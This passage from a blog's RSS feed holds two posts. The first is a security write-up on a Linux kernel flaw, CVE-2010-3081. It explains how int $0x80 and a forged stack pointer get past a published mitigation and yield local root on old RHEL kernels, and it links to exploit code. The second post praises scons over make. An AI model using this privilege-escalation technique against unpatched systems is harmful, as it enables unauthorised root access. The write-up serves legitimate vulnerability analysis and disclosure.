systems. <code>compat_alloc_user_space</code> allocates and returns space on the
userspace kernel stack for the kernel to use:</p>

<pre><code>static inline void __user *compat_alloc_user_space(long len)
{
    struct pt_regs *regs = task_pt_regs(current);
    return (void __user *)regs-&gt;sp - len;
}
</code></pre>

<p>This function is only called by compat-mode syscalls, so <code>current</code> is assumed to
be a 32-bit process, in which case <code>regs-&gt;sp</code>, the user stack pointer, will be a
32-bit quantity. This, if we subtract a small <code>len</code>, the result should still fit
in 32 bits, which, on a 64-bit system means it is guaranteed to fall within the
user address space.</p>

<p>Because of this, some callers of <code>compat_alloc_user_space</code> were lazy, and did
not call <code>access_ok</code> (or a function which called <code>access_ok</code>) to check that the
result of <code>compat_alloc_user_space</code> fell within the user address space.</p>

<p>However, it turned out that some call sites in the kernel called
<code>compat_alloc_user_space</code> with a user-controlled <code>len</code> value, allowing the
subtraction to wrap around. On a 64-bit system, the kernel lives in the top four
gigabytes of memory, and so this wraparound is enough for a user to cause
<code>compat_alloc_user_space</code> to return a pointer into the kernel&#8217;s address space.</p>

<p>Moreover, it turned out that the functions that used a user-controlled <code>len</code>
also did not check <code>access_ok</code> on the result of the allocation. In particular,
Linux 2.6.26 introduced the <code>compat_mc_getsockopt</code> function, which called
<code>compat_alloc_user_space</code> with a user-controlled length and then copied
user-controlled data to this pointer. It is this function which the public
exploit targetted.</p>

<h2>Disabling 32-bit binaries doesn&#8217;t help</h2>

<p>When an <a href="http://www.seclists.org/fulldisclosure/2010/Sep/268">exploit</a> was released for this bug, many sources
circulated a <a href="https://access.redhat.com/kb/docs/DOC-40265">mitigation</a>: Disable 32-bit binaries on a
system. Prevent compat-mode processes from running, the logic goes,
and you prevent anyone from making a compat-mode syscall that triggers
the vulnerable path.</p>

<p>This mitigation indeed prevented the public exploit from working (it
included 32-bit inline assembly, and so couldn&#8217;t even easily be
recompiled as a 64-bit binary), and many observers seemed to believe
it closed the bug entirely.</p>

<p>However, this was not the case! It turns out, on an <code>amd64</code> system, a
64-bit process can still make a compat-mode system call using the <code>int
$0x80</code> instruction, which is the traditional 32-bit syscall mechanism!
Even though the process is running in 64-bit mode, <code>int $0x80</code>
redirects to the compat-mode syscall table.</p>

<p>After realizing this, modifying the public exploit to work when
compiled in 64-bit mode was a simple matter of porting the inline
assembly, and changing a small handful of types. I&#8217;ve posted the
modified <a href="http://nelhage.com/files/abftw_64.c">exploit</a> and the <a href="http://nelhage.com/files/abftw.diff">diff</a> against the original
for the curious.</p>

<h2>The integer overflow is totally irrelevant</h2>

<p>Once you&#8217;ve realized that you can make compat-mode system calls from a 64-bit
process, a little bit of thought reveals something else
interesting. <code>compat_alloc_user_space</code> subtracts the <code>len</code> value off of the
userspace stack pointer. Previously, we relied on subtracting a large value from
a 32-bit stack pointer in order to end up with a kernel pointer. However, while
a 32-bit is limited to a 32-bit stack pointer, a 64-bit process can write a full
64-bit value into <code>%rsp</code>, and thus <code>regs-&gt;sp</code>! There&#8217;s no need for underflow at
all &#8212; you can just write a 64-bit value into <code>%rsp</code> and do an <code>int $0x80</code>, and
make <code>compat_alloc_user_space</code> return any value you please!</p>

<p>The condition for exploitability thus drops from &#8220;user-controlled
<code>len</code> and no <code>access_ok</code>&#8221; to simply &#8220;no <code>access_ok</code>&#8220;.</p>

<p>This is interesting, because it turns out that some very old kernels, before
2.6.11, including RHEL 4, have the following function:</p>

<pre><code>int siocdevprivate_ioctl(unsigned int fd, unsigned int cmd, unsigned long arg)
{
        struct ifreq __user *u_ifreq64;

        ...
        u_ifreq64 = compat_alloc_user_space(sizeof(*u_ifreq64));

        /* Don't check these user accesses, just let that get trapped
         * in the ioctl handler instead.
         */
        copy_to_user(&amp;u_ifreq64-&gt;ifr_ifrn.ifrn_name[0], &amp;tmp_buf[0], IFNAMSIZ);
        __put_user(data64, &amp;u_ifreq64-&gt;ifr_ifru.ifru_data);

        return sys_ioctl(fd, cmd, (unsigned long) u_ifreq64);
}
</code></pre>

<p>Remember, we can make <code>compat_alloc_user_space</code> return an arbitrary
value. The <code>copy_to_user</code> will call <code>access_ok</code> and fail, but that
return value will be discarded, and the <code>__put_user</code> will scribble 32
bits of user-controlled data at a user-controlled address. Bingo,
local root.</p>

<p>It turns out this function was present in Linux 2.4.x, too, meaning
that this exploit even affected RHEL3 and anyone else still running a
2.4-based system!</p>

<p>Based on this exploit, I&#8217;ve produced a working proof-of-concept
exploit for RHEL4, based on the released exploit for RHEL5. Contact me
if you&#8217;re interested, but it&#8217;s pretty straightforward.</p>

<h2>Closing notes</h2>

<p>As far as I know, neither of these facts has been publically
documented prior to this post. I shared this information with Red Hat,
and they requested I keep it private until they released fixes for
RHEL 3, which happened last week. I would not be at all surprised to
learn that someone else has private exploits that incorporate either
or both of these observations, though.</p>

<p>One important moral here is you must be <em>very careful</em> when declaring
a system unaffected by a vulnerability, or declaring a mitigation to
be complete. Software systems have gotten tremendously complex, and
it&#8217;s often impossible to be totally confident you understand every
last way an attacker could tickle a vulnerability.</p>
]]></content:encoded>
			<wfw:commentRss>http://blog.nelhage.com/2010/11/exploiting-cve-2010-3081/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Why scons is cool</title>
		<link>http://blog.nelhage.com/2010/11/why-scons-is-cool/</link>
		<comments>http://blog.nelhage.com/2010/11/why-scons-is-cool/#comments</comments>
		<pubDate>Sun, 07 Nov 2010 22:00:38 +0000</pubDate>
		<dc:creator>nelhage</dc:creator>
				<category><![CDATA[Software Engineering]]></category>
		<category><![CDATA[build]]></category>
		<category><![CDATA[C]]></category>
		<category><![CDATA[make]]></category>
		<category><![CDATA[scons]]></category>
		<category><![CDATA[unix]]></category>

		<guid isPermaLink="false">http://blog.nelhage.com/?p=394</guid>
		<description><![CDATA[I&#8217;ve recently started playing with scons a little for some small personal projects. It&#8217;s not perfect, but I&#8217;ve rapidly come to the conclusion that it&#8217;s a probably far better choice than make in many cases. The main exceptions would be cases where you need to integrate into legacy build systems, or if asking or expecting [...]]]></description>
				<content:encoded><![CDATA[<p>I&#8217;ve recently started playing with <code>scons</code> a little for some small
personal projects. It&#8217;s not perfect, but I&#8217;ve rapidly come to the
conclusion that it&#8217;s a probably far better choice than <code>make</code> in many
cases. The main exceptions would be cases where you need to integrate
into legacy build systems, or if asking or expecting developers to
have <code>scons</code> installed is unreasonable for some reason.</p>

<p>The main reason that <code>scons</code> is cool to me, and the thing that makes
it fundamentally different from <code>make</code>, is the introduction of actual
scoping.</p>

<p><code>make</code> has a single global scope. This is one of the main reasons that
people write recursive Makefiles; By giving you one file per
directory, you get one scope per directory, which makes it possible to
have per-directory pattern rules, variables, and all that other stuff,
without driving yourself insane.</p>

<p><code>make</code>&#8216;s awful syntax, confusing varieties of variable,
whitespace-sensitivity, and all the other things that people love to
bitch about are annoying, but to my mind, the single scope that makes
recursive Makefiles the dominant (and, really, the only scalable)
paradigm is the one thing that really sucks.</p>

<p><code>scons</code> solves this by baking various kinds of scoping into the
tool. <code>scons</code> lets you include sub-build-scripts (typically named
<code>SConscript</code>, by convention). Those scripts run in their own namespace
and can establish their own variables, rules, etc., but the end result
is then merged back into the global rule list (handling sub-directory
paths intelligently), so that the scheduler can work globally, instead
of having to recurse.</p>

<p>Furthermore, because of this explicit scoping, you can pass variables,
including targets, between build files, letting you explicitly set up
cross-directory dependencies or share <code>CFLAGS</code> or other variables,
making it easy for different directories to share exactly as much or
as little configuration as you want.</p>

<p>In addition, <code>scons</code> has the concept of &#8220;build environments&#8221;, which
are objects that include build rules, variables, and so on. By
reifying what <code>make</code> just represents as the global environment into
objects, it makes it much easier to scope and program things. For
example, if you have a set of targets that should be built using the
global default rules, except with debugging enabled, you can do:</p>

<pre><code>myenv = env.Clone()
myenv.Append(CFLAGS = ['-g'])
myenv.Program(...)
</code></pre>

<p>By making it (optionally) explicit which sets of rules and variables
are being used in each place, it becomes much easier to share multiple
kinds of targets and rule sets in a single file, without necessitating
lots of sub-files just for scoping, like <code>make</code> tends to lead to.</p>

<p><code>scons</code> is cool for a bunch of reasons. It eliminates most of the
stupid little annoyances you&#8217;ve probably had with <code>make</code>. But, in my
mind, this is the thing that makes it cool. They&#8217;ve added sane scoping
to the build tool, so that you can construct non-recursive build
systems without going insane.</p>

<p>I&#8217;ll definitely be considering <code>scons</code> for any new projects I write going
forward. I hate <code>make</code>, and this definitely feels like a path forward.</p>
]]></content:encoded>
			<wfw:commentRss>http://blog.nelhage.com/2010/11/why-scons-is-cool/feed/</wfw:commentRss>
		<slash:comments>5</slash:comments>
		</item>
	</channel>
</rss>
